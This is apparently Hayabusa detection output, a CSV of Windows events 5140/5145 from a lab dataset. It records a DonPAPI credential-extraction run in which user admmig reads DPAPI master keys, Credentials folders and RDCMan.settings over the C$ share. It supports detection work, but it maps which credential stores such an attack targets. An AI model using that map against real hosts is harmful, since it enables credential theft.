2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.977 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.978 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.034 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.037 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
